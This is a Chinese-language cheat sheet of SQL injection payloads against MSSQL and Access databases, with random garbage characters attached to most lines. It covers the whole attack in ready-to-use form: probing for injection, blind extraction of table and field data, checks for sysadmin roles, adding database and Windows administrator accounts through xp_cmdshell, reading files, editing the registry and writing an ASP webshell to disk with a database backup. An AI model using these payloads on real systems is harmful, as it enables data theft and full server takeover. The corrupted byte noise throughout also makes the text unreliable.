1.判断是否有注入;and 1=1 ;and 1=2 P!]D�V$�o�
2.初步判断是否是mssql ;and user>0 �6fk�L�@It
w�HIS}OONz
3.注入参数是字符'and [查询条件] and ''=' $}HSU�>,%
�[q(�7J�v�
4.搜索时没过滤参数的'and [查询条件] and '%25'=' �wz:w�R��+
=(hEr=f>�7
5.判断数据库系统 -�2Ub'�*qK
ueq����R@i
;and (select count(*) from sysobjects)>0 mssql +,�P�B�hB�
��{8��JJ$_
;and (select count(*) from msysobjects)>0 access Z�~]17�{x0
(#
?~^ut��
ap=�M$9�L'
)IhI~,0Nmj
6.猜数据库 ;and (select Count(*) from [数据库名])>0 H"n�"Q:Yp
NB,�iC
[e�
7.猜字段 ;and (select Count(字段名) from 数据库名)>0 1;��H( �
0}�w>8L7i{
8.猜字段中记录长度 ;and (select top 1 len(字段名) from 数据库名)>0 �Z7%�>O:@z
a{H�~>d<�?
9.(1)猜字段的ascii值(access) rV�1�J�J.I
��mNuv>GAb
;and (select top 1 asc(mid(字段名,1,1)) from 数据库名)>0 Bj\0R�mVa1
&d6'$h:kHb
(2)猜字段的ascii值(mssql) �f PDn��kr
.Cm��wR$u&
;and (select top 1 unicode(substring(字段名,1,1)) from 数据库名)>0 Nf3K�z�#!B
���� /@%
10.测试权限结构(mssql) XmX��Hs4��
H!vv�dp?Z
0p�~��:�fm
o&X!75�^G>
;and 1=(select IS_SRVROLEMEMBER('sysadmin'));-- *S�<>_R �8
���fxyPh��
;and 1=(select IS_SRVROLEMEMBER('serveradmin'));-- qwV�pGNc45
�Rdv�JA:;q
;and 1=(select IS_SRVROLEMEMBER('setupadmin'));-- L$�Ss]A�r=
J��Ls7[W)O
;and 1=(select IS_SRVROLEMEMBER('securityadmin'));-- ��*<��BasP
�PUu��c�Yc
;and 1=(select IS_SRVROLEMEMBER('diskadmin'));-- �S .��1~�#
b-~Gt�]%>m
;and 1=(select IS_SRVROLEMEMBER('bulkadmin'));-- KcY 2lTvx
�Imi_}NB+�
;and 1=(select IS_MEMBER('db_owner'));-- [}�+
��MZ�
|�\elM[G"g
C2!POf;GdN
6��g7 X1C
11.添加mssql和系统的帐户 +EkZyM~�z2
Cee�?%NaTS
;exec master.dbo.sp_addlogin username;-- x'�n J_0
;exec master.dbo.sp_password null,username,password;-- i7Y��9�6]�
Ro?�4t��Gn
;exec master.dbo.sp_addsrvrolemember sysadmin username;-- 9\�|�3Gm_�
syV��&�Ds)
;exec master.dbo.xp_cmdshell 'net user username password 5\qoZ�s*e�
uVIs5IZzIi
/workstations:*/times:all/passwordchg:yes /passwordreq:yes /active:yes /add';-- 7��GE�.>h5
�V.��:im�j
;exec master.dbo.xp_cmdshell 'net user username password /add';-- "�r.pU(uxt
v{&c��god
;exec master.dbo.xp_cmdshell 'net localgroup administrators username /add';-- }�vp\lK��P
|W{�z,e01x
�.M�l}cE$L
��<Gs)~T#'
12.(1)遍历目录 �Rs5G5W@"A
=��V��%s�^
;create table dirs(paths varchar(100), id int) Fi1gM}>�py
O@?�?
NF6G
;insert dirs exec master.dbo.xp_dirtree 'c:\' WG���(t�t.
�S'2����B
;and (select top 1 paths from dirs)>0 ~�#@sZ�0/<
ym�<G.3%1
;and (select top 1 paths from dirs where paths not in('上步得到的paths'))>) m
{wMzs��Q
Hza�{"�I*^
w^�z}!/"]u
e9"�<.:�&�
(2)遍历目录 wrw~��J���
�'$4o,GA8�
;create table temp(id nvarchar(255),num1 nvarchar(255),num2 nvarchar(255),num3 nvarchar(255));-- j�9%=8Dn.<
;insert temp exec master.dbo.xp_availablemedia;-- 获得当前所有驱动器 JdF�M�SmZ@
Dj
#G{X".
;insert into temp(id) exec master.dbo.xp_subdirs 'c:\';-- 获得子目录列表 �g]z�,�*d�
Cc/?-0a2!�
;insert into temp(id,num1) exec master.dbo.xp_dirtree 'c:\';-- 获得所有子目录的目录树构 M}3>5*!��=
UPUO8W)<Z6
;insert into temp(id) exec master.dbo.xp_cmdshell 'type c:\web\index.asp';-- 查看文件的内容 �p�A4���oy
sf7�'8+wj>
w�6�v �P
a
cm]8���m_!
13.mssql中的存储过程 pH'��#v]�"
j`gg�g]"&$
xp_regenumvalues 注册表根键, 子键 +'JM:};1X8
�vR-rCve$P
;exec xp_regenumvalues 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion\Run' 以多个记录集方式返回所有键值 W}�.;]x%1B
:C_�\.p�A
xp_regread 根键,子键,键值名 C]��\�r~f�
r��h?!f(_@
;exec xp_regread ?VO*s-G:J�
kbBX�\*{yh
'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','CommonFilesDir' 返回制定键的值 asmMl9)(`�
�V�b|�DNl@
xp_regwrite 根键,子键, 值名, 值类型, 值 C�3hnX�2";
�N�-4L�dC
值类型有2种REG_SZ 表示字符型,REG_DWORD 表示整型 gO1`zP�!9Z
aKk��QXq�*
;exec xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','TestValueName','reg_sz','hello' 写入注册表 �KP -�g<Zc
�2<
w/GX.�
xp_regdeletevalue 根键,子键,值名 p!|ok�#s�W
2?nK�71c�"
exec xp_regdeletevalue 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','TestValueName' 删除某个值 ��r,!7TuBl
`��2J�u�[P
xp_regdeletekey 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion\Testkey' 删除键,包括该键下所有值 ��z?�H��vh
�HB�V~`0O$
B/c_�pRl�;
bJmVq%>;�
14.mssql的backup创建webshell P`�c��Eu6:
ePP-&V"`"�
use model �U[��u9R�B
(Lo��<3a-]
create table cmd(str image); J�`Q#p�%W
1 n�Ib�/nY
insert into cmd(str) values (''); ,3!l'|0�jJ
v%V�CF�J�
backup database model to disk='c:\l.asp'; b�6'%�nR*f
#3f\,4K��5
v@&&�5�J�|
�t�E�/j3�
15.mssql内置函数 �{c��kA�
O\q�|b#q}/
;and (select @@version)>0 获得Windows的版本号 6�,y�lk�f3
ICTl{�|i ]
;and user_name()='dbo' 判断当前系统的连接用户是不是sa _6;T
/_R=�
%($sj|��_l
;and (select user_name())>0 爆当前系统的连接用户 EXK�~Zf|&Z
3&/5!zOg)
;and (select db_name())>0 得到当前连接的数据库 ��A?06fo,�
S6�*3."S�k
wBTnI>l9�[
�gxyc�w4kz
16.简洁的webshell GE\@mu *pO
��]/XNf�b�
use model Mmq{]q~At�
H�Wi�0m/�J
create table cmd(str image); =m�xmJF�A�
�=�1�!wep"
insert into cmd(str) values (''); O{y�2tz�3�
��<VS\z(K
backup database model to disk='g:\wwwtest\l.asp';
